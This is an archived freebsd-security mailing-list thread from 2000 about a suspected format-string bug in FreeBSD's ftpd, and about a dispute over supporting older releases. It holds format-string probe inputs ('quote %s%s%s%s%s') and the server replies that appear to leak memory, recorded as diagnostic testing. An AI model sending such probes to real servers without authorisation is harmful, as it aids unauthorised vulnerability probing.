Dmitry.

On Mon, 2 Oct 2000, Brett Glass wrote:

> Date: Mon, 02 Oct 2000 12:33:47 -0600
> From: Brett Glass
> To: "Chris D . Faulhaber"
> Cc: security@FreeBSD.ORG
> Subject: Re: ftpd bug in FreeBSD through at least 3.4
>
> At 12:29 PM 10/2/2000, Chris D . Faulhaber wrote:
>
> >The system's ftp daemon or wu-ftpd? The ftp daemons installed with 3.5.1
> >and 4.1[.1] don't seem affected.
>
> It DEFINITELY works on FreeBSD's own ftpd in 3.4-RELEASE and all 2.x versions
> I have tested.
>
> --Brett

From owner-freebsd-security Mon Oct 2 12:39:47 2000
From: Warner Losh
To: Brett Glass
Cc: "Chris D. Faulhaber", security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Date: Mon, 02 Oct 2000 13:39:42 -0600
Message-Id: <200010021939.NAA14026@harmony.village.org>
In-Reply-To: <4.3.2.7.2.20001002133032.00dfb540@localhost>

In message <4.3.2.7.2.20001002133032.00dfb540@localhost> Brett Glass writes:
: There's a problem with bugs in some of the clients, and it's obscuring
: problems in the server! See my most recent message to Alex Charalabidis.

Right. I was using a known good client :-) 4.1.1's client doesn't core
dump either.
Warner

From owner-freebsd-security Mon Oct 2 12:43:23 2000
From: Justin Stanford
To: Brett Glass
Cc: Alex Charalabidis, "Chris D. Faulhaber", security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Date: Mon, 2 Oct 2000 21:42:27 +0200 (SAST)
In-Reply-To: <4.3.2.7.2.20001002125825.00de8f00@localhost>

I tried using ncftp2 to eradicate any bugs in 'ftp' that may be obscuring
problems with 'ftpd'.

>
> ftp> quote %s%s%s%s%s
> 500 '+H|X++_YX++|¶QUOTE %s%s%s%s%s(null)%s%s%s%s%s': command not understood.

Same response.

> quote %s%s%s%s%s
'%S%S%S%S%S': command not understood.

> Now, let's send a command with more %s format directives to the server:
>
> ftp> quote %s%s%s%s%s%s%s%s%s%s
> (Nothing)
>
> The ftpd process on the server is alive but seems to be hung parsing the command.
> So, something is amiss, but to what extent it is exploitable I can't tell.
> It DOES happen even in 4.1, though.

> quote %s%s%s%s%s%s%s%s%s%s
'%S%S%S%S%S%S%S%S%S%S': command not understood.

Not so here.. a perfectly normal response. This is ftp'ing to localhost on
4.0-STABLE... I can then proceed normally with ftp'ing as well - the server
does not hang.
Regards,
jus

From owner-freebsd-security Mon Oct 2 12:44:57 2000
From: Nate Williams
To: Poul-Henning Kamp
Cc: James Wyatt, Brett Glass, "Chris D. Faulhaber", security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Date: Mon, 2 Oct 2000 13:44:22 -0600 (MDT)
Message-Id: <200010021944.NAA18121@nomad.yogotech.com>
In-Reply-To: <21970.970515180@critter>
Reply-To: nate@yogotech.com (Nate Williams)

> >> >>3.4 is a dead branch, 2.x even more so.
> >> >
> >> >People are still running it 3.x, though. LOTS of people.
> >>
> >> Doesn't change the fact that it's a dead branch.
> >
> >Doesn't change the fact that "LOTS of people" are still running it...
> >Geez, what a curt, rude, throw-your-hands-up answer.
> >
> >Are you saying that if we found a terrible bug (not this easy one)
> >somewhere critical in 3.5.%d, we'd all have to immediately upgrade? - Jy@
>
> Yes, I am saying that.

FWIW, I agree with Poul.
We don't have the resources to support anything but '-stable', so if you
have an older release and need a bug-fix, you're forced to support yourself
(i.e. provide a bug-fix on your own), or you must upgrade to the most recent
'-stable' bits.

For those of you with more of a clue, it's not that difficult to support
older versions of FreeBSD. For example, a firewall at my old employer is
still running FreeBSD 2.2.8-stable, and aside from local exploits, the box
is both stable and pretty dang secure. All code (userland and kernel) with
known remote exploits has either been upgraded (sendmail, BIND, etc...), or
the kernel modifications have been merged in and/or ported back to FreeBSD
2.2 by myself from newer releases.

Since I'm no longer with the company, it hasn't been as actively maintained,
but on the flip side, it hasn't needed much maintenance. I still keep in
contact with the current sys-ad, and if a problem that affects him comes up,
I'll let him know. Who knows, he might hire me to fix the bug.
:) :)

Nate

From owner-freebsd-security Mon Oct 2 12:45:49 2000
From: Brett Glass
To: Jordan Hubbard
Cc: security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Date: Mon, 02 Oct 2000 13:43:33 -0600
Message-Id: <4.3.2.7.2.20001002133527.00d604a0@localhost>
In-Reply-To: <59846.970514080@winston.osd.bsdi.com>

At 01:14 PM 10/2/2000, Jordan Hubbard wrote:

>That's the client crashing, you knob. Read the advisories more closely.
>What linux ftp clients do is not all that urgent a concern of ours.

Jordan:

Alas, there is still reason for concern. Here's why:

1) At least some FreeBSD clients are also crashing in the same way as the
Linux client described in that message. They're segfaulting, which means
they could be susceptible to attacks from malicious servers.

2) There is still some funkiness in recent FreeBSD servers too. This is
evidenced by the fact that bad commands can generate responses which look
like a memory dump. They also mess up the output of ps(1). See my message
a few minutes ago to Alex, which shows problems in the server when I submit
bad commands using the MS-DOS/Windows client.
--Brett

From owner-freebsd-security Mon Oct 2 12:51:20 2000
From: "John Howie"
To: "James Wyatt", "Poul-Henning Kamp"
Cc: "Brett Glass", "Chris D. Faulhaber"
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Date: Mon, 2 Oct 2000 12:56:56 -0700
Message-ID: <036301c02caa$ebc17300$fd01a8c0@pacbell.net>

----- Original Message -----
From: "Poul-Henning Kamp"
To: "James Wyatt"
Cc: "Brett Glass" ; "Chris D . Faulhaber" ;
Sent: Monday, October 02, 2000 12:33 PM
Subject: Re: ftpd bug in FreeBSD through at least 3.4

> In message , James Wyatt writes:
> >On Mon, 2 Oct 2000, Poul-Henning Kamp wrote:
> >> In message <4.3.2.7.2.20001002124607.00df8150@localhost>, Brett Glass writes:
> >> >At 12:35 PM 10/2/2000, Poul-Henning Kamp wrote:
> >> >
> >> >>3.4 is a dead branch, 2.x even more so.
> >> >
> >> >People are still running it 3.x, though. LOTS of people.
> >>
> >> Doesn't change the fact that it's a dead branch.
> >
> >Doesn't change the fact that "LOTS of people" are still running it...
> >Geez, what a curt, rude, throw-your-hands-up answer.
> >
> >Are you saying that if we found a terrible bug (not this easy one)
> >somewhere critical in 3.5.%d, we'd all have to immediately upgrade? - Jy@
>
> Yes, I am saying that.
  ^^^^^^^^^^^^^^^^^^^^^

And this is why Linux, FreeBSD, OpenBSD, et al will NEVER beat a supported
pay-for-use Operating System like Windows in the eyes of real-world
business-critical system administrators and CIOs. Of course, all the egos,
moaning, and bitching don't help either.

Yours in disgust,

John Howie

From owner-freebsd-security Mon Oct 2 12:54:35 2000
From: Garance A Drosihn
To: Matt Dillon, freebsd-security@FreeBSD.ORG
Subject: Re: Proposed minor mod to openssh for interactive operation
Date: Mon, 2 Oct 2000 15:54:25 -0400
In-Reply-To: <200009300023.e8U0NUW20137@earth.backplane.com>

At 5:23 PM -0700 9/29/00, Matt Dillon wrote:
> At the moment openssh only turns on TCP_NODELAY etc if it
> thinks you are creating an interactive shell, based on
> whether it allocates a pty or not.
>
> Unfortunately, I have an application (and I expect this
> would be useful generally) which uses a ssh link between
> two programs interactively.
> That is, send command, wait response, send command, wait
> response. Delaying packets is a bad idea and cuts
> performance over the link by about 20%.

Would it be more appropriate to use stunnel (in ports) instead
of an ssh connection for your application? (I'm just wondering...)
---
Garance Alistair Drosehn           =   gad@eclipse.acs.rpi.edu
Senior Systems Programmer          or  drosih@rpi.edu
Rensselaer Polytechnic Institute

From owner-freebsd-security Mon Oct 2 12:56:20 2000
From: Poul-Henning Kamp
To: "John Howie"
Cc: "James Wyatt", "Brett Glass", "Chris D. Faulhaber", security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Date: Mon, 02 Oct 2000 21:56:02 +0200
Message-ID: <23683.970516562@critter>
In-Reply-To: <036301c02caa$ebc17300$fd01a8c0@pacbell.net>

In message <036301c02caa$ebc17300$fd01a8c0@pacbell.net>, "John Howie" writes:
>> >Are you saying that if we found a terrible bug (not this easy one)
>> >somewhere critical in 3.5.%d, we'd all have to immediately upgrade? - Jy@
>>
>> Yes, I am saying that.
> ^^^^^^^^^^^^^^^^^^^^^
>
>And this is why Linux, FreeBSD, OpenBSD, et al will NEVER beat a supported
>pay-for-use Operating System like Windows in the eyes of real-world
>business-critical system administrators and CIOs. Of course, all the egos,
>moaning, and bitching don't help either.

Send me private email, and I'll send you my pricelist. Once you've taken
your pick there, we are competing on level ground.

Until you do, you're asking me to waste my spare time because you cannot be
bothered to upgrade your system to recent releases. Feel free to estimate
my enthusiasm for your problem.
--
Poul-Henning Kamp       | UNIX since Zilog Zeus 3.20
phk@FreeBSD.ORG         | TCP/IP since RFC 956
FreeBSD coreteam member | BSD since 4.3-tahoe
Never attribute to malice what can adequately be explained by incompetence.

From owner-freebsd-security Mon Oct 2 13:01:49 2000
From: Neil Blakey-Milner
To: Brett Glass
Cc: Jordan Hubbard, security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Date: Mon, 2 Oct 2000 22:01:20 +0200
Message-ID: <20001002220120.A59204@mithrandr.moria.org>
In-Reply-To: <4.3.2.7.2.20001002133527.00d604a0@localhost>; from brett@lariat.org on Mon, Oct 02, 2000 at 01:43:33PM -0600
Organization: Sunesi Clinical Systems
X-Operating-System: FreeBSD 3.3-RELEASE i386

On Mon 2000-10-02 (13:43), Brett Glass wrote:
> At 01:14 PM 10/2/2000, Jordan Hubbard wrote:
>
> >That's the client crashing, you knob. Read the advisories more closely.
> >What linux ftp clients do is not all that urgent a concern of ours.
>
> Jordan:
>
> Alas, there is still reason for concern. Here's why:
>
> 1) At least some FreeBSD clients are also crashing in the same way as the
> Linux client described in that message.
> They're segfaulting, which means
> they could be susceptible to attacks from malicious servers.

You aren't keeping your machines up to date. This was fixed in RELENG_3
already:

revision 1.14.2.3
date: 2000/06/23 14:46:54;  author: ru;  state: Exp;  lines: +3 -3
MFC: (rev 1.17) Get rid of segfault in a `site %s\' case.

> 2) There is still some funkiness in recent FreeBSD servers too. This is
> evidenced by the fact that bad commands can generate responses which look
> like a memory dump. They also mess up the output of ps(1). See my message
> a few minutes ago to Alex, which shows problems in the server when I submit
> bad commands using the MS-DOS/Windows client.

I don't see this with a 3.3 or 3.4 ftpd.

Neil

--
Neil Blakey-Milner
Sunesi Clinical Systems
nbm@mithrandr.moria.org

From owner-freebsd-security Mon Oct 2 13:08:09 2000
From: Bill Fumerola
To: John Howie
Cc: James Wyatt, Poul-Henning Kamp, Brett Glass, "Chris D .
Faulhaber", security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Date: Mon, 2 Oct 2000 16:08:07 -0400
Message-ID: <20001002160807.O38472@jade.chc-chimes.com>
In-Reply-To: <036301c02caa$ebc17300$fd01a8c0@pacbell.net>; from JHowie@msn.com on Mon, Oct 02, 2000 at 12:56:56PM -0700
X-Operating-System: FreeBSD 3.3-STABLE i386

On Mon, Oct 02, 2000 at 12:56:56PM -0700, John Howie wrote:
> > >Are you saying that if we found a terrible bug (not this easy one)
> > >somewhere critical in 3.5.%d, we'd all have to immediately upgrade? - Jy@
> >
> > Yes, I am saying that.
> ^^^^^^^^^^^^^^^^^^^^^
>
> And this is why Linux, FreeBSD, OpenBSD, et al will NEVER beat a supported
> pay-for-use Operating System like Windows in the eyes of real-world
> business-critical system administrators and CIOs. Of course, all the egos,
> moaning, and bitching don't help either.

Thankfully, PHBs aren't a target market of FreeBSD.

--
Bill Fumerola - Network Architect, BOFH / Chimes, Inc.
billf@chimesnet.com / billf@FreeBSD.org

From owner-freebsd-security Mon Oct 2 13:30:11 2000
From: Brett Glass
To: Neil Blakey-Milner
Cc: Jordan Hubbard, security@FreeBSD.ORG
Subject: FTP problems: Clients? Servers? Both?
Date: Mon, 02 Oct 2000 14:29:25 -0600
Message-Id: <4.3.2.7.2.20001002140904.00df5390@localhost>
In-Reply-To: <20001002220120.A59204@mithrandr.moria.org>

At 02:01 PM 10/2/2000, Neil Blakey-Milner wrote:

>You aren't keeping your machines up to date. This was fixed in RELENG_3
>already:
>
>revision 1.14.2.3
>date: 2000/06/23 14:46:54;  author: ru;  state: Exp;  lines: +3 -3
>MFC: (rev 1.17) Get rid of segfault in a `site %s\' case.

I have machines of all ages here. Remember that we are waiting for 4.2 to
upgrade some machines from 3.x.

>> 2) There is still some funkiness in recent FreeBSD servers too. This is
>> evidenced by the fact that bad commands can generate responses which look
>> like a memory dump. They also mess up the output of ps(1).
>> See my message
>> a few minutes ago to Alex, which shows problems in the server when I submit
>> bad commands using the MS-DOS/Windows client.
>
>I don't see this with a 3.3 or 3.4 ftpd.

My latest tests seem to indicate that the MS-DOS/Windows client may not be
pristine either. (It is based, as I recall, on an old Berkeley release.) It
may respond in an untoward manner to sequences such as %s. So, I have
dropped down to the lowest common denominator and am using Telnet to fire
commands at the various ftpd versions.

Based on that modus operandi, I am beginning to think that the problems are
mostly in clients. But there are also some odd things in servers (including
FreeBSD's). The one you point out above (only fixed recently) is a good
example. I also see a few minor nits (FreeBSD's ftpd seems to give double
error messages in some cases, and does not trim trailing whitespace in
commands) for which I'll probably submit patches once I figure out whether
there's anything exploitable in the latest servers.

--Brett

From owner-freebsd-security Mon Oct 2 14:13:35 2000
From: Robert Watson
To: Nate Williams
Cc: Poul-Henning Kamp, James Wyatt, Brett Glass, "Chris D .
Faulhaber", security@FreeBSD.org, asmodai@FreeBSD.org
Subject: Re: ftpd bug in FreeBSD through at least 3.4
Date: Mon, 2 Oct 2000 17:10:49 -0400 (EDT)
In-Reply-To: <200010021944.NAA18121@nomad.yogotech.com>

On Mon, 2 Oct 2000, Nate Williams wrote:

> > >> >>3.4 is a dead branch, 2.x even more so.
> > >> >
> > >> >People are still running it 3.x, though. LOTS of people.
> > >>
> > >> Doesn't change the fact that it's a dead branch.
> > >
> > >Doesn't change the fact that "LOTS of people" are still running it...
> > >Geez, what a curt, rude, throw-your-hands-up answer.
> > >
> > >Are you saying that if we found a terrible bug (not this easy one)
> > >somewhere critical in 3.5.%d, we'd all have to immediately upgrade? - Jy@
> >
> > Yes, I am saying that.
>
> FWIW, I agree with Poul. We don't have the resources to support
> anything but '-stable', so if you have an older release and need a bug-fix,
> you're forced to support yourself (i.e. provide a bug-fix on your own),
> or you must upgrade to the most recent '-stable' bits.

I guess I have mixed feelings on both sides of the argument here: it's
clearly the case that dropping support for a branch within a few months of
a release on it is undesirable. However, it's also the case that resources
are very constrained towards providing continuing support. It is the case
that, at least for security fixes, they can and should be backported
wherever feasible. Recently, Jeroen Ruigrok van der Werven has been doing
some work to backport incremental improvements to the 3-STABLE branch to
ensure that it at least remains usable. I think it is too early to write
off 3-STABLE as there is a huge install base for the branch, and many
products based on it. We don't even have a native Netscape build for
4-STABLE yet :-). I think it is fine to assert that no new feature
development is occurring there, however.
Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 14:25:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 3C0B437B503 for ; Mon, 2 Oct 2000 14:25:31 -0700 (PDT) Received: from bsdie.rwsystems.net([209.197.223.2]) (2472 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Mon, 2 Oct 2000 16:05:01 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Mon, 2 Oct 2000 16:05:00 -0500 (CDT) From: James Wyatt To: Brett Glass Cc: Alex Charalabidis , "Chris D . Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: <4.3.2.7.2.20001002125825.00de8f00@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 2 Oct 2000, Brett Glass wrote: > At 12:51 PM 10/2/2000, Alex Charalabidis wrote: > >Yes it does. It was posted to bugtraq as a proftpd bug on 25 Jul 00 by > >Carlos Eduardo Gorges . I confirmed the bug existed on > >our 6.00LS too (and promptly forgot :P). As far as I know, there have be= en=20 > >no exploits and it's not even a DoS since the parent process is=20 > >unaffected. The default FreeBSD ftp client crashes before the server=20 > >process does, so you can only see the problem with a client on a differe= nt > >OS (oddly enough, the MS-DOS 7 client seems to be the only one that > >creates no problems at all). >=20 > Interesting. 
It appears that my earlier tests were not conclusive because= =20 > there were problems in both the server AND the client. Thank you for > pointing this out! There are no survivors... (^_^) > Let's try testing the server with the MS-DOS 7 client, so that any proble= ms=20 > with the FreeBSD FTP client are not a factor. >=20 > I am now using the MS-DOS 7 client and connecting to a FreeBSD 4.1+ serve= r=20 > (running FreeBSD 4.1-20000916-STABLE). Here's what I see from the client = side: >=20 > ftp> quote %s%s%s%s%s > 500 '+H|X++_YX++|=B6QUOTE %s%s%s%s%s(null)%s%s%s%s%s': command not unders= tood. >=20 > This means that while the FreeBSD FTP client crashed (and generated the s= egfault > message), the server did not crash. However, there's still junk in the me= ssage > sent back by the server, which indicates that I may be getting at the sta= ck > here. Let me get this straight: A DOS executable survived better than a FreeBSD one? It also let you hurt the server more? Thanks for testing folks. Does everyone see the irony in this or is it just me? - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 14:38:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id 5157437B502 for ; Mon, 2 Oct 2000 14:38:10 -0700 (PDT) Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.0/8.9.3) with ESMTP id e92LWFU60753; Mon, 2 Oct 2000 14:32:18 -0700 (PDT) (envelope-from jkh@winston.osd.bsdi.com) To: "John Howie" Cc: "James Wyatt" , "Poul-Henning Kamp" , "Brett Glass" , "Chris D . Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: Message from "John Howie" of "Mon, 02 Oct 2000 12:56:56 PDT." 
<036301c02caa$ebc17300$fd01a8c0@pacbell.net> Date: Mon, 02 Oct 2000 14:32:14 -0700 Message-ID: <60749.970522334@winston.osd.bsdi.com> From: Jordan Hubbard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > And this is why Linux, FreeBSD, OpenBSD, et al will NEVER beat a supported > pay-for-use Operating System like Windows in the eyes of real-world > business-critical system administrators and CIOs. Of course, all the egos, > moaning, and bitching don't help either. If you want to buy a support contract for older version of FreeBSD, please contact BSDi at 1-800-800-4BSD (or +1 719 457 8400 outside the USA) or, if you prefer, any of the other companies offering commercial support for *BSD which are listed in the gallery. Expecting unpaid volunteers to perform the same function as the pay-for-use operating system vendors would be so unrealistic as to border on idiocy and so I can only give you the benefit of the doubt in assuming you must have been talking about something else. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 14:39:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 65A6037B503; Mon, 2 Oct 2000 14:39:17 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA29594; Mon, 2 Oct 2000 14:39:17 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Mon, 2 Oct 2000 14:39:17 -0700 From: Kris Kennaway To: Brett Glass Cc: Alex Charalabidis , "Chris D . 
Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 Message-ID: <20001002143917.B22329@freefall.freebsd.org> References: <4.3.2.7.2.20001002123113.049344d0@localhost> <4.3.2.7.2.20001002125825.00de8f00@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5i In-Reply-To: <4.3.2.7.2.20001002125825.00de8f00@localhost>; from brett@lariat.org on Mon, Oct 02, 2000 at 01:28:39PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Oct 02, 2000 at 01:28:39PM -0600, Brett Glass wrote: > At 12:51 PM 10/2/2000, Alex Charalabidis wrote: > ftp> quote %s%s%s%s%s > 500 '+H|X++_YX++|¶QUOTE %s%s%s%s%s(null)%s%s%s%s%s': command not understood. > > This means that while the FreeBSD FTP client crashed (and generated the segfault > message), the server did not crash. However, there's still junk in the message > sent back by the server, which indicates that I may be getting at the stack > here. No, I think your client is expanding the %s locally and sending the junk to the server. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 14:48:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 6E3E637B502 for ; Mon, 2 Oct 2000 14:48:12 -0700 (PDT) Received: from bsdie.rwsystems.net([209.197.223.2]) (2333 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Mon, 2 Oct 2000 16:30:37 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Mon, 2 Oct 2000 16:30:36 -0500 (CDT) From: James Wyatt To: Poul-Henning Kamp Cc: Brett Glass , "Chris D . 
Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: <21970.970515180@critter> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 2 Oct 2000, Poul-Henning Kamp wrote: > In message , Jam > es Wyatt writes: > >On Mon, 2 Oct 2000, Poul-Henning Kamp wrote: > >> In message <4.3.2.7.2.20001002124607.00df8150@localhost>, Brett Glass writes: > >> >At 12:35 PM 10/2/2000, Poul-Henning Kamp wrote: > >> > > >> >>3.4 is a dead branch, 2.x even more so. > >> > > >> >People are still running it 3.x, though. LOTS of people. > >> > >> Doesn't change the fact that it's a dead branch. > > > >Doesn't change the fact that "LOTS of people" are still running it... > >Geez, what a curt, rude, throw-your-hands-up answer. > > > >Are you saying that if we found a terrible bug (not this easy one) > >somewhere critical in 3.5.%d, we'd all have to immediatly upgrade? - Jy@ > > Yes, I am saying that. Then why is Walnut Creek CDROM still selling it as a current product? I don't see Fry's selling older copies of Windows 3.* or DOS 3/4/5, do you? I know there are two forks of FreeBSD - active and stable. That's great for making "leading-edge v.s. state-of-the-art" decisions, but even the palace at Redmond will give me free fixes for Win95 security bugs. (Some think of it as a quantity discount as bug counts go infinite, price goes to zero. (^_^) OS revisions are a fact of life, but since 4v0 was just released in April and took some time to get to 4v1 (never trust %d.0 releases), I would have expected a bit more support. Sometimes CVS isn't the answer - like the 2v2r8 release firewall one of my cheaper clients has. We are going to put a 4v1r1 box in place of it, but usually replacement is a pain. 
- Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 15:43:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id EAA9337B503 for ; Mon, 2 Oct 2000 15:43:31 -0700 (PDT) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13gEIt-0004mp-00; Tue, 03 Oct 2000 00:43:23 +0200 Date: Tue, 3 Oct 2000 00:43:23 +0200 (IST) From: Roman Shterenzon To: John Howie Cc: security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: <60749.970522334@winston.osd.bsdi.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 2 Oct 2000, Jordan Hubbard wrote: > > And this is why Linux, FreeBSD, OpenBSD, et al will NEVER beat a supported > > pay-for-use Operating System like Windows in the eyes of real-world > > business-critical system administrators and CIOs. Of course, all the egos, > > moaning, and bitching don't help either. Just curious if msn.com stands for Microsoft Network. Oh, and by the way, Microsoft is a supported pay-for-use Operating System provider. It's the legend of bugtraq. P.S. Now, I think this thread was longer than it should have been... --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. 
Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 15:46:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.rpi.edu (mail.rpi.edu [128.113.100.7]) by hub.freebsd.org (Postfix) with ESMTP id 4FBB137B502 for ; Mon, 2 Oct 2000 15:46:09 -0700 (PDT) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail.rpi.edu (8.9.3/8.9.3) with ESMTP id SAA415612; Mon, 2 Oct 2000 18:43:19 -0400 Mime-Version: 1.0 X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: References: Date: Mon, 2 Oct 2000 18:43:18 -0400 To: James Wyatt , Poul-Henning Kamp From: Garance A Drosihn Subject: Re: ftpd bug in FreeBSD through at least 3.4 Cc: Brett Glass , "Chris D . Faulhaber" , security@FreeBSD.ORG Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 4:30 PM -0500 10/2/00, James Wyatt wrote: >On Mon, 2 Oct 2000, Poul-Henning Kamp wrote: > > James Wyatt writes: > > > Are you saying that if we found a terrible bug (not this easy > > > one) somewhere critical in 3.5.%d, we'd all have to immediatly > > > upgrade? - Jy@ > > > > Yes, I am saying that. > >Then why is Walnut Creek CDROM still selling it as a current product? >I don't see Fry's selling older copies of Windows 3.* or DOS 3/4/5, >do you? > >I know there are two forks of FreeBSD - active and stable. That's >great for making "leading-edge v.s. state-of-the-art" decisions, >but even the palace at Redmond will give me free fixes for Win95 >security bugs. (Some think of it as a quantity discount as bug >counts go infinite, price goes to zero. (^_^) I am not sure why this particular teapot is seeing a tempest right now. Depending on the situation, freebsd 3.x-stable may very well see some updates. Once it sees an update, then people will have to upgrade to get that update. 
That may mean someone running 3.2 will suddenly have to upgrade to 3.x-stable. How do you expect updates to work, if you are not expecting to upgrade to get those updates? We are not going to release 3.2.1 to fix a bug in ftpd, just because some people might find it more convenient than having to upgrade from 3.2 to 3.5 (or whatever release we're up to there). As time goes on, it will be less and less likely that even 3.x-stable will get updates, because it will be so far behind whatever "today's stable" is. As time goes on, a fix written for "today's stable" will not even apply to 3.x-stable, which means that a DIFFERENT update will need to be written. And if it's a different update, then we need a different path to test that update out. The farther behind you are from "today's stable", the more likely that it will be too much work for the project to provide a reliable (tested) security fix to some ancient release of the system. People who really are serious about tracking security fixes should realize that they DO have to keep upgrading their OS. Discussions about "inconvenience" are silly in that context. They will find it a lot more inconvenient to be broken into. If you find that a problem, then buy a support contract. I am sure that BSDi (among others) will be just as happy to charge you for support as Microsoft has been.... Also note that Microsoft CHARGED YOU for support (directly or indirectly) when you first got the OS. That's why they might have more resources to provide support as your OS gets long in the tooth. 
--- Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu Senior Systems Programmer or drosih@rpi.edu Rensselaer Polytechnic Institute To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 15:46:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id 0EFB537B66E for ; Mon, 2 Oct 2000 15:46:12 -0700 (PDT) Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.0/8.9.3) with ESMTP id e92MebU72369; Mon, 2 Oct 2000 15:40:37 -0700 (PDT) (envelope-from jkh@winston.osd.bsdi.com) To: James Wyatt Cc: Poul-Henning Kamp , Brett Glass , "Chris D . Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: Message from James Wyatt of "Mon, 02 Oct 2000 16:30:36 CDT." Date: Mon, 02 Oct 2000 15:40:37 -0700 Message-ID: <72365.970526437@winston.osd.bsdi.com> From: Jordan Hubbard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Then why is Walnut Creek CDROM still selling it as a current product? Because Walnut Creek CDROM (aka BSDI) still supports it. We don't expect the project to do that for free, of course. 
